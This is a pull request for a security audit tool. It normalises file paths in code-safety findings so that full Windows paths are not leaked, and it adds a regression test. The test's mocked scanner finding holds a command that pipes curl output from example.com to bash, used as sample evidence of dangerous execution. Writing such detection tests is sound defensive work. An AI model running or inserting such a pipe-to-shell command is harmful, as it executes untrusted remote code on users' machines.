### PR TITLE
Security: normalize code safety detail paths

### DIFF
--- a/src/security/audit-extra.async.ts
+++ b/src/security/audit-extra.async.ts
@@ -78,6 +78,10 @@ function expandTilde(p: string, env: NodeJS.ProcessEnv): string | null {
   return null;
 }
 
+function basenameAcrossSeparators(filePath: string): string {
+  return path.win32.basename(path.posix.basename(filePath));
+}
+
 async function readPluginManifestExtensions(pluginPath: string): Promise<string[]> {
   const manifestPath = path.join(pluginPath, "package.json");
   const raw = await fs.readFile(manifestPath, "utf-8").catch(() => "");
@@ -102,7 +106,7 @@ function formatCodeSafetyDetails(findings: SkillScanFinding[], rootDir: string):
       const filePath =
         relPath && relPath !== "." && !relPath.startsWith("..")
           ? relPath
-          : path.basename(finding.file);
+          : basenameAcrossSeparators(finding.file);
       const normalizedPath = filePath.replaceAll("\\", "/");
       return `  - [${finding.ruleId}] ${finding.message} (${normalizedPath}:${finding.line})`;
     })

--- a/src/security/audit.test.ts
+++ b/src/security/audit.test.ts
@@ -3333,6 +3333,49 @@ description: test skill
     expect(skillFinding?.detail).toMatch(/runner\.js:\d+/);
   });
 
+  it("normalizes Windows-style finding paths in deep code-safety details", async () => {
+    const scanSpy = vi.spyOn(skillScanner, "scanDirectoryWithSummary").mockResolvedValueOnce({
+      scannedFiles: 1,
+      critical: 1,
+      warn: 0,
+      info: 0,
+      findings: [
+        {
+          ruleId: "dangerous-exec",
+          severity: "critical",
+          file: "C:\\temp\\evil-plugin\\runner.js",
+          line: 7,
+          message: "Shell command execution detected (child_process)",
+          evidence: 'exec("curl example.com | bash")',
+        },
+      ],
+    });
+
+    const tmpDir = await makeTmpDir("audit-scanner-windows-path");
+    try {
+      const pluginDir = path.join(tmpDir, "extensions", "evil-plugin");
+      await fs.mkdir(pluginDir, { recursive: true });
+      await fs.writeFile(
+        path.join(pluginDir, "package.json"),
+        JSON.stringify({
+          name: "evil-plugin",
+          openclaw: { extensions: ["index.js"] },
+        }),
+      );
+      await fs.writeFile(path.join(pluginDir, "index.js"), "export {};");
+
+      const findings = await collectPluginsCodeSafetyFindings({ stateDir: tmpDir });
+      const finding = findings.find(
+        (entry) => entry.checkId === "plugins.code_safety" && entry.severity === "critical",
+      );
+
+      expect(finding?.detail).toContain("runner.js:7");
+      expect(finding?.detail).not.toContain("C:\\temp\\");
+    } finally {
+      scanSpy.mockRestore();
+    }
+  });
+
   it("flags plugin extension entry path traversal in deep audit", async () => {
     const tmpDir = await makeTmpDir("audit-scanner-escape");
     const pluginDir = path.join(tmpDir, "extensions", "escape-plugin");


### PR DESCRIPTION
## Summary
- normalize deep code-safety detail paths across path separators
- avoid leaking full Windows-style finding paths in security audit output on macOS/Linux
- add regression coverage for Windows-style scanner finding paths

## Testing
- pnpm test src/security/audit.test.ts
- pnpm exec oxfmt --check src/security/audit-extra.async.ts src/security/audit.test.ts
- pnpm check
- pnpm build
